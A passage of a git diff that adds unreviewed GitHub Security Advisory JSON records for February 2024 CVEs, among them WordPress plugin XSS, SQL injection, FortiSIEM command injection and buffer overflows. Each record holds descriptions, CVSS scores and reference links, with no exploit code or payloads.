"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1121" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cffx-cf3x-mr9h/GHSA-cffx-cf3x-mr9h.json b/advisories/unreviewed/2024/02/GHSA-cffx-cf3x-mr9h/GHSA-cffx-cf3x-mr9h.json new file mode 100644 index 0000000000000..be294396cbcd6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cffx-cf3x-mr9h/GHSA-cffx-cf3x-mr9h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cffx-cf3x-mr9h", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43536" + ], + "details": "Transient DOS while parse fils IE with length equal to 1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43536" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cgc5-3h4x-24c6/GHSA-cgc5-3h4x-24c6.json b/advisories/unreviewed/2024/02/GHSA-cgc5-3h4x-24c6/GHSA-cgc5-3h4x-24c6.json new file mode 100644 index 0000000000000..2d9885a0d00e7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cgc5-3h4x-24c6/GHSA-cgc5-3h4x-24c6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgc5-3h4x-24c6", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2024-1073" + ], + "details": "The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1073" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-slimstat/trunk/admin/index.php#L1004" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/33cba63c-4629-48fd-850f-f68dad626a67?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T05:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ch4v-95r5-xc38/GHSA-ch4v-95r5-xc38.json b/advisories/unreviewed/2024/02/GHSA-ch4v-95r5-xc38/GHSA-ch4v-95r5-xc38.json new file mode 100644 index 0000000000000..a3b59a6ec48d9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ch4v-95r5-xc38/GHSA-ch4v-95r5-xc38.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ch4v-95r5-xc38", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-24161" + ], + "details": "MRCMS 3.0 contains an Arbitrary File Read vulnerability in /admin/file/edit.do as the incoming path parameter is not filtered.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24161" + }, + { + "type": "WEB", + "url": "https://github.com/wy876/cve/issues/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-552" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-chj3-8q43-rcc8/GHSA-chj3-8q43-rcc8.json b/advisories/unreviewed/2024/02/GHSA-chj3-8q43-rcc8/GHSA-chj3-8q43-rcc8.json new file mode 100644 index 0000000000000..3efc2c90b2173 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-chj3-8q43-rcc8/GHSA-chj3-8q43-rcc8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chj3-8q43-rcc8", + "modified": "2024-02-07T15:30:47Z", + "published": "2024-02-05T15:30:23Z", + "aliases": [ + "CVE-2024-23108" + ], + "details": "An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23108" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-130" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T14:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cj8g-f3w9-gg24/GHSA-cj8g-f3w9-gg24.json b/advisories/unreviewed/2024/02/GHSA-cj8g-f3w9-gg24/GHSA-cj8g-f3w9-gg24.json new file mode 100644 index 0000000000000..48369b05be447 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cj8g-f3w9-gg24/GHSA-cj8g-f3w9-gg24.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cj8g-f3w9-gg24", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41292" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41292" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-46" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cm2j-xhch-gm5q/GHSA-cm2j-xhch-gm5q.json b/advisories/unreviewed/2024/02/GHSA-cm2j-xhch-gm5q/GHSA-cm2j-xhch-gm5q.json new file mode 100644 index 0000000000000..2a6a54eb08122 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cm2j-xhch-gm5q/GHSA-cm2j-xhch-gm5q.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cm2j-xhch-gm5q", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-7029" + ], + "details": "The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including 9.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 9.7.6.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7029" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3024075/maxbuttons" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bca0e8a0-d837-42d8-a9d3-35e0c820eb43?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json b/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json new file mode 100644 index 0000000000000..ab3f428c9fa2c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmx3-whxw-v8mp", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2023-50488" + ], + "details": "An issue in Blurams Lumi Security Camera (A31C) v23.0406.435.4120 allows attackers to execute arbitrary code.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50488" + }, + { + "type": "WEB", + "url": "https://github.com/roman-mueller/PoC/tree/master/CVE-2023-50488" + }, + { + "type": "WEB", + "url": "https://infosec.rm-it.de/2024/02/01/blurams-lumi-security-camera-analysis/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cpxr-hfmm-j69h/GHSA-cpxr-hfmm-j69h.json b/advisories/unreviewed/2024/02/GHSA-cpxr-hfmm-j69h/GHSA-cpxr-hfmm-j69h.json new file mode 100644 index 0000000000000..b45957e8f9ee2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cpxr-hfmm-j69h/GHSA-cpxr-hfmm-j69h.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpxr-hfmm-j69h", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-06T18:30:20Z", + "aliases": [ + "CVE-2024-1251" + ], + "details": "A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.10. Affected is an unknown function of the file /general/email/outbox/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-252990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1251" + }, + { + "type": "WEB", + "url": "https://github.com/rockersiyuan/CVE/blob/main/TongDa%20Sql%20inject.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252990" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252990" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-crhq-582w-h987/GHSA-crhq-582w-h987.json b/advisories/unreviewed/2024/02/GHSA-crhq-582w-h987/GHSA-crhq-582w-h987.json new file mode 100644 index 0000000000000..f7b5b6050c58e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-crhq-582w-h987/GHSA-crhq-582w-h987.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crhq-582w-h987", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2024-22433" + ], + "details": "\nDell Data Protection Search 19.2.0 and above contain an exposed password opportunity in plain text when using LdapSettings.get_ldap_info in DP Search. A remote unauthorized unauthenticated attacker could potentially exploit this vulnerability leading to a loss of Confidentiality, Integrity, Protection, and remote takeover of the system. This is a high-severity vulnerability as it allows an attacker to take complete control of DP Search to affect downstream protected devices.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22433" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000221720/dsa-2024-063-security-update-for-dell-data-protection-search-multiple-security-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-538" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T07:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json b/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json new file mode 100644 index 0000000000000..d234e9a044dd2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crr8-wrxj-8vg6", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24188" + ], + "details": "Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24188" + }, + { + "type": "WEB", + "url": "https://github.com/pcmacdon/jsish/issues/100" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-crrf-qhw3-5g49/GHSA-crrf-qhw3-5g49.json b/advisories/unreviewed/2024/02/GHSA-crrf-qhw3-5g49/GHSA-crrf-qhw3-5g49.json new file mode 100644 index 0000000000000..18150e01cac2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-crrf-qhw3-5g49/GHSA-crrf-qhw3-5g49.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crrf-qhw3-5g49", + "modified": "2024-02-02T09:30:21Z", + "published": "2024-02-02T09:30:21Z", + "aliases": [ + "CVE-2024-21780" + ], + "details": "Stack-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. Processing a specially crafted command may result in a denial of service (DoS) condition. Note that the affected products are no longer supported.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21780" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/vu/JVNVU93740658/" + }, + { + "type": "WEB", + "url": "https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cvgq-qqv7-prrh/GHSA-cvgq-qqv7-prrh.json b/advisories/unreviewed/2024/02/GHSA-cvgq-qqv7-prrh/GHSA-cvgq-qqv7-prrh.json new file mode 100644 index 0000000000000..cd6f218cb0554 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cvgq-qqv7-prrh/GHSA-cvgq-qqv7-prrh.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvgq-qqv7-prrh", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-1194" + ], + "details": "A vulnerability classified as problematic has been found in Armcode AlienIP 2.41. Affected is an unknown function of the component Locate Host Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1194" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/25-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252684" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252684" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cvpw-2w45-gm65/GHSA-cvpw-2w45-gm65.json b/advisories/unreviewed/2024/02/GHSA-cvpw-2w45-gm65/GHSA-cvpw-2w45-gm65.json new file mode 100644 index 0000000000000..37223518b5e4a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cvpw-2w45-gm65/GHSA-cvpw-2w45-gm65.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvpw-2w45-gm65", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24861" + ], + "details": "A race condition was found in the Linux kernel's media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24861" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8150" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cw37-799x-r3xf/GHSA-cw37-799x-r3xf.json b/advisories/unreviewed/2024/02/GHSA-cw37-799x-r3xf/GHSA-cw37-799x-r3xf.json new file mode 100644 index 0000000000000..538a9ca1b4a5c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cw37-799x-r3xf/GHSA-cw37-799x-r3xf.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw37-799x-r3xf", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-24001" + ], + "details": "jshERP v3.3 is vulnerable to SQL Injection. via the com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findallocationDetail() function of jshERP which allows an attacker to construct malicious payload to bypass jshERP's protection mechanism.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24001" + }, + { + "type": "WEB", + "url": "https://github.com/jishenghua/jshERP/issues/99" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24001.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cxgx-xggq-rg7w/GHSA-cxgx-xggq-rg7w.json b/advisories/unreviewed/2024/02/GHSA-cxgx-xggq-rg7w/GHSA-cxgx-xggq-rg7w.json new file mode 100644 index 0000000000000..01d2ad6cf864b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cxgx-xggq-rg7w/GHSA-cxgx-xggq-rg7w.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxgx-xggq-rg7w", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-22795" + ], + "details": "Insecure Permissions vulnerability in Forescout SecureConnector v.11.3.06.0063 allows a local attacker to escalate privileges via the Recheck Compliance Status component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22795" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Hagrid29/aea0dc35a1e87813dbbb7b317853d023" + }, + { + "type": "WEB", + "url": "https://github.com/Hagrid29/ForeScout-SecureConnector-EoP" + }, + { + "type": "WEB", + "url": "https://www.forescout.com/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cxwq-x5m7-2p4v/GHSA-cxwq-x5m7-2p4v.json b/advisories/unreviewed/2024/02/GHSA-cxwq-x5m7-2p4v/GHSA-cxwq-x5m7-2p4v.json new file mode 100644 index 0000000000000..2b220e912c120 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cxwq-x5m7-2p4v/GHSA-cxwq-x5m7-2p4v.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxwq-x5m7-2p4v", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-6221" + ], + "details": "\nThe cloud provider MachineSense uses for integration and deployment for multiple MachineSense devices, such as the programmable logic controller (PLC), PumpSense, PowerAnalyzer, FeverWarn, and others is insufficiently protected against unauthorized access. An attacker with access to the internal procedures could view source code, secret credentials, and more.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6221" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-f4w8-52pm-ghr9/GHSA-f4w8-52pm-ghr9.json b/advisories/unreviewed/2024/02/GHSA-f4w8-52pm-ghr9/GHSA-f4w8-52pm-ghr9.json new file mode 100644 index 0000000000000..68289989523b5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f4w8-52pm-ghr9/GHSA-f4w8-52pm-ghr9.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f4w8-52pm-ghr9", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50940" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 275130.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50940" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275130" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-697", + "CWE-942" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-f527-jggh-c37w/GHSA-f527-jggh-c37w.json b/advisories/unreviewed/2024/02/GHSA-f527-jggh-c37w/GHSA-f527-jggh-c37w.json new file mode 100644 index 0000000000000..dd5e4632ab55c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f527-jggh-c37w/GHSA-f527-jggh-c37w.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f527-jggh-c37w", + "modified": "2024-02-02T06:30:32Z", + "published": "2024-02-02T06:30:32Z", + "aliases": [ + "CVE-2024-1047" + ], + "details": "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register_reference() function in all versions up to, and including, 2.10.28. This makes it possible for unauthenticated attackers to update the connected API keys.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1047" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php#L175" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029507/themeisle-companion/tags/2.10.29/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6147582f-578a-47ad-b16c-65c37896783d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json b/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json new file mode 100644 index 0000000000000..c776219561166 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5c4-v2h9-f7mq", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22239" + ], + "details": "Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain regular shell access. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22239" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git 